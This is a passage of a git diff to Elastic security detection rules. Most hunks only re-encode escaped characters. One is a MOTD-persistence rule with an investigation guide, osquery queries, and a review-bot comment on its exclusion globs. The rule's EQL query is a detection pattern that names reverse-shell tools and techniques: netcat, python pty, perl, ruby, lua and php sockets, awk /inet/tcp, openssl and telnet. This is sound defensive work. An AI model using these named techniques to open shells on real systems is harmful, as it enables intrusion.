If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count >= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", "references": [ 
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
 ],
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json
index 11ffc90daf1..d2678228cd8 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_7.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count \u003e= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe 
message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count >= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (process.parent.args : \"--force\" or process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\"))\n", "references": [ 
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
 ],
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json
index 339c873f36b..9a9943bfd48 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_104.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json
index 89ba983b791..343d491e5e3 100644
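Review bot: The trailing `not (process.parent.args : "--force" or process.args : ("/usr/games/lolcat", "/usr/bin/screenfetch"))` exclusion in the new-side `query`, and the `not process.args : ("-*z*", "-*l*")` clause in its netcat branch, are not explained anywhere in the rule, while the `note`'s "False positive analysis" section states the activity is unlikely to happen legitimately. The `-*l*` glob matches any dash-prefixed argument that contains an `l` anywhere, so it is wider than the listen-mode exclusion it presumably intends and will also silence some outbound invocations; if listeners are covered by another rule, a tighter pattern or a sentence in the note would make the gap deliberate rather than accidental. A suitable addition under "False positive analysis" would be `- Netcat listen and zero-I/O invocations, the lolcat and screenfetch helpers, and MOTD scripts invoked with --force are intentionally excluded by the trailing not clauses of the query.` This hunk only re-serializes `\u003e` as `>`, so the point is pre-existing, and the rule object starts and ends outside the hunk.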
--- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_105.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json
index 8391c921d69..997731c78ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_106.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json
index 3c2ea98add9..5284d54761f 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_107.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json
index 402ec8e210c..d7436191fcd 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_108.json
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json
index bd567a0b43e..2a1e6a11463 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_102.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json
index d86ff21fd0a..952565e9d7c 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json
index 7fac70a8e52..140637190ec 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_104.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json
index a3bc6a67223..4c46467d7a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_105.json
@@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json index 90a33b5bf2c..83dd53ca1bc 100644 --- a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json +++ b/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_102.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -66,7 +66,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/4edd3e1a-3aa0-499b-8147-4d2ea43b1613_103.json 